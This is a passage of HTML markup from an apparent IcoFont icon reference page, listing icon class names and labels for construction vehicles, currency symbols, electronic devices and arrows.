				</div> 
				<span> under-construction-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-under-construction"></i>
				</div> 
				<span> under-construction </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vehicle-cement"></i>
				</div> 
				<span> vehicle-cement </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vehicle-crane"></i>
				</div> 
				<span> vehicle-crane </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vehicle-delivery-van"></i>
				</div> 
				<span> vehicle-delivery-van </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vehicle-dozer"></i>
				</div> 
				<span> vehicle-dozer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vehicle-excavator"></i>
				</div> 
				<span> vehicle-excavator </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vehicle-trucktor"></i>
				</div> 
				<span> vehicle-trucktor </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vehicle-wrecking"></i>
				</div> 
				<span> vehicle-wrecking </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-worker"></i>
				</div> 
				<span> worker </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-workers-group"></i>
				</div> 
				<span> workers-group </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wrench"></i>
				</div> 
				<span> wrench </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-afghani-false"></i>
				</div> 
				<span> afghani-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-afghani-minus"></i>
				</div> 
				<span> afghani-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-afghani-plus"></i>
				</div> 
				<span> afghani-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-afghani-true"></i>
				</div> 
				<span> afghani-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-afghani"></i>
				</div> 
				<span> afghani </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baht-false"></i>
				</div> 
				<span> baht-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baht-minus"></i>
				</div> 
				<span> baht-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baht-plus"></i>
				</div> 
				<span> baht-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baht-true"></i>
				</div> 
				<span> baht-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baht"></i>
				</div> 
				<span> baht </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bitcoin-false"></i>
				</div> 
				<span> bitcoin-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bitcoin-minus"></i>
				</div> 
				<span> bitcoin-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bitcoin-plus"></i>
				</div> 
				<span> bitcoin-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bitcoin-true"></i>
				</div> 
				<span> bitcoin-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bitcoin"></i>
				</div> 
				<span> bitcoin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dollar-flase"></i>
				</div> 
				<span> dollar-flase </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dollar-minus"></i>
				</div> 
				<span> dollar-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dollar-plus"></i>
				</div> 
				<span> dollar-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dollar-true"></i>
				</div> 
				<span> dollar-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dollar"></i>
				</div> 
				<span> dollar </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dong-false"></i>
				</div> 
				<span> dong-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dong-minus"></i>
				</div> 
				<span> dong-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dong-plus"></i>
				</div> 
				<span> dong-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dong-true"></i>
				</div> 
				<span> dong-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dong"></i>
				</div> 
				<span> dong </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-euro-false"></i>
				</div> 
				<span> euro-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-euro-minus"></i>
				</div> 
				<span> euro-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-euro-plus"></i>
				</div> 
				<span> euro-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-euro-true"></i>
				</div> 
				<span> euro-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-euro"></i>
				</div> 
				<span> euro </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-frank-false"></i>
				</div> 
				<span> frank-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-frank-minus"></i>
				</div> 
				<span> frank-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-frank-plus"></i>
				</div> 
				<span> frank-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-frank-true"></i>
				</div> 
				<span> frank-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-frank"></i>
				</div> 
				<span> frank </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hryvnia-false"></i>
				</div> 
				<span> hryvnia-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hryvnia-minus"></i>
				</div> 
				<span> hryvnia-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hryvnia-plus"></i>
				</div> 
				<span> hryvnia-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hryvnia-true"></i>
				</div> 
				<span> hryvnia-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hryvnia"></i>
				</div> 
				<span> hryvnia </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lira-false"></i>
				</div> 
				<span> lira-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lira-minus"></i>
				</div> 
				<span> lira-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lira-plus"></i>
				</div> 
				<span> lira-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lira-true"></i>
				</div> 
				<span> lira-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lira"></i>
				</div> 
				<span> lira </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peseta-false"></i>
				</div> 
				<span> peseta-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peseta-minus"></i>
				</div> 
				<span> peseta-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peseta-plus"></i>
				</div> 
				<span> peseta-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peseta-true"></i>
				</div> 
				<span> peseta-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peseta"></i>
				</div> 
				<span> peseta </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peso-false"></i>
				</div> 
				<span> peso-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peso-minus"></i>
				</div> 
				<span> peso-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peso-plus"></i>
				</div> 
				<span> peso-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peso-true"></i>
				</div> 
				<span> peso-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-peso"></i>
				</div> 
				<span> peso </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pound-false"></i>
				</div> 
				<span> pound-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pound-minus"></i>
				</div> 
				<span> pound-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pound-plus"></i>
				</div> 
				<span> pound-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pound-true"></i>
				</div> 
				<span> pound-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pound"></i>
				</div> 
				<span> pound </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-renminbi-false"></i>
				</div> 
				<span> renminbi-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-renminbi-minus"></i>
				</div> 
				<span> renminbi-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-renminbi-plus"></i>
				</div> 
				<span> renminbi-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-renminbi-true"></i>
				</div> 
				<span> renminbi-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-renminbi"></i>
				</div> 
				<span> renminbi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-riyal-false"></i>
				</div> 
				<span> riyal-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-riyal-minus"></i>
				</div> 
				<span> riyal-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-riyal-plus"></i>
				</div> 
				<span> riyal-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-riyal-true"></i>
				</div> 
				<span> riyal-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-riyal"></i>
				</div> 
				<span> riyal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rouble-false"></i>
				</div> 
				<span> rouble-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rouble-minus"></i>
				</div> 
				<span> rouble-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rouble-plus"></i>
				</div> 
				<span> rouble-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rouble-true"></i>
				</div> 
				<span> rouble-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rouble"></i>
				</div> 
				<span> rouble </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rupee-false"></i>
				</div> 
				<span> rupee-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rupee-minus"></i>
				</div> 
				<span> rupee-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rupee-plus"></i>
				</div> 
				<span> rupee-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rupee-true"></i>
				</div> 
				<span> rupee-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rupee"></i>
				</div> 
				<span> rupee </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-taka-false"></i>
				</div> 
				<span> taka-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-taka-minus"></i>
				</div> 
				<span> taka-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-taka-plus"></i>
				</div> 
				<span> taka-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-taka-true"></i>
				</div> 
				<span> taka-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-taka"></i>
				</div> 
				<span> taka </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-turkish-lira-false"></i>
				</div> 
				<span> turkish-lira-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-turkish-lira-minus"></i>
				</div> 
				<span> turkish-lira-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-turkish-lira-plus"></i>
				</div> 
				<span> turkish-lira-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-turkish-lira-true"></i>
				</div> 
				<span> turkish-lira-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-turkish-lira"></i>
				</div> 
				<span> turkish-lira </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-won-false"></i>
				</div> 
				<span> won-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-won-minus"></i>
				</div> 
				<span> won-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-won-plus"></i>
				</div> 
				<span> won-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-won-true"></i>
				</div> 
				<span> won-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-won"></i>
				</div> 
				<span> won </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-yen-false"></i>
				</div> 
				<span> yen-false </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-yen-minus"></i>
				</div> 
				<span> yen-minus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-yen-plus"></i>
				</div> 
				<span> yen-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-yen-true"></i>
				</div> 
				<span> yen-true </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-yen"></i>
				</div> 
				<span> yen </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-android-nexus"></i>
				</div> 
				<span> android-nexus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-android-tablet"></i>
				</div> 
				<span> android-tablet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-apple-watch"></i>
				</div> 
				<span> apple-watch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-drawing-tablet"></i>
				</div> 
				<span> drawing-tablet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-earphone"></i>
				</div> 
				<span> earphone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flash-drive"></i>
				</div> 
				<span> flash-drive </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-game-console"></i>
				</div> 
				<span> game-console </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-game-controller"></i>
				</div> 
				<span> game-controller </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-game-pad"></i>
				</div> 
				<span> game-pad </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-game"></i>
				</div> 
				<span> game </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-headphone-alt-1"></i>
				</div> 
				<span> headphone-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-headphone-alt-2"></i>
				</div> 
				<span> headphone-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-headphone-alt-3"></i>
				</div> 
				<span> headphone-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-headphone-alt"></i>
				</div> 
				<span> headphone-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-headphone"></i>
				</div> 
				<span> headphone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-htc-one"></i>
				</div> 
				<span> htc-one </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-imac"></i>
				</div> 
				<span> imac </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ipad"></i>
				</div> 
				<span> ipad </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-iphone"></i>
				</div> 
				<span> iphone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ipod-nano"></i>
				</div> 
				<span> ipod-nano </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ipod-touch"></i>
				</div> 
				<span> ipod-touch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-keyboard-alt"></i>
				</div> 
				<span> keyboard-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-keyboard-wireless"></i>
				</div> 
				<span> keyboard-wireless </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-keyboard"></i>
				</div> 
				<span> keyboard </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-laptop-alt"></i>
				</div> 
				<span> laptop-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-laptop"></i>
				</div> 
				<span> laptop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-macbook"></i>
				</div> 
				<span> macbook </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-magic-mouse"></i>
				</div> 
				<span> magic-mouse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-micro-chip"></i>
				</div> 
				<span> micro-chip </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-microphone-alt"></i>
				</div> 
				<span> microphone-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-microphone"></i>
				</div> 
				<span> microphone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-monitor"></i>
				</div> 
				<span> monitor </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mouse"></i>
				</div> 
				<span> mouse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mp3-player"></i>
				</div> 
				<span> mp3-player </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-nintendo"></i>
				</div> 
				<span> nintendo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-playstation-alt"></i>
				</div> 
				<span> playstation-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-psvita"></i>
				</div> 
				<span> psvita </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-radio-mic"></i>
				</div> 
				<span> radio-mic </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-radio"></i>
				</div> 
				<span> radio </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-refrigerator"></i>
				</div> 
				<span> refrigerator </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-samsung-galaxy"></i>
				</div> 
				<span> samsung-galaxy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-surface-tablet"></i>
				</div> 
				<span> surface-tablet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-head-phone"></i>
				</div> 
				<span> ui-head-phone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ui-keyboard"></i>
				</div> 
				<span> ui-keyboard </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-washing-machine"></i>
				</div> 
				<span> washing-machine </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wifi-router"></i>
				</div> 
				<span> wifi-router </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wii-u"></i>
				</div> 
				<span> wii-u </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-windows-lumia"></i>
				</div> 
				<span> windows-lumia </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wireless-mouse"></i>
				</div> 
				<span> wireless-mouse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-xbox-360"></i>
				</div> 
				<span> xbox-360 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-arrow-down"></i>
				</div> 
				<span> arrow-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-arrow-left"></i>
				</div> 
				<span> arrow-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-arrow-right"></i>
				</div> 
				<span> arrow-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-arrow-up"></i>
				</div> 
				<span> arrow-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-block-down"></i>
				</div> 
				<span> block-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-block-left"></i>
				</div> 
				<span> block-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-block-right"></i>
				</div> 
				<span> block-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-block-up"></i>
				</div> 
				<span> block-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bubble-down"></i>
				</div> 
				<span> bubble-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bubble-left"></i>
				</div> 
				<span> bubble-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bubble-right"></i>
				</div> 
				<span> bubble-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bubble-up"></i>
				</div> 
				<span> bubble-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-caret-down"></i>
				</div> 
				<span> caret-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-caret-left"></i>
				</div> 
				<span> caret-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-caret-right"></i>
				</div> 
				<span> caret-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-caret-up"></i>
				</div> 
				<span> caret-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-circled-down"></i>
				</div> 
				<span> circled-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-circled-left"></i>
				</div> 
				<span> circled-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-circled-right"></i>
				</div> 
				<span> circled-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-circled-up"></i>
				</div> 
				<span> circled-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-collapse"></i>
				</div> 
				<span> collapse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cursor-drag"></i>
				</div> 
				<span> cursor-drag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-curved-double-left"></i>
				</div> 
				<span> curved-double-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-curved-double-right"></i>
				</div> 
				<span> curved-double-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-curved-down"></i>
				</div> 
				<span> curved-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-curved-left"></i>
				</div> 
				<span> curved-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-curved-right"></i>
				</div> 
				<span> curved-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-curved-up"></i>
				</div> 
				<span> curved-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dotted-down"></i>
				</div> 
				<span> dotted-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dotted-left"></i>
				</div> 
				<span> dotted-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dotted-right"></i>
				</div> 
				<span> dotted-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
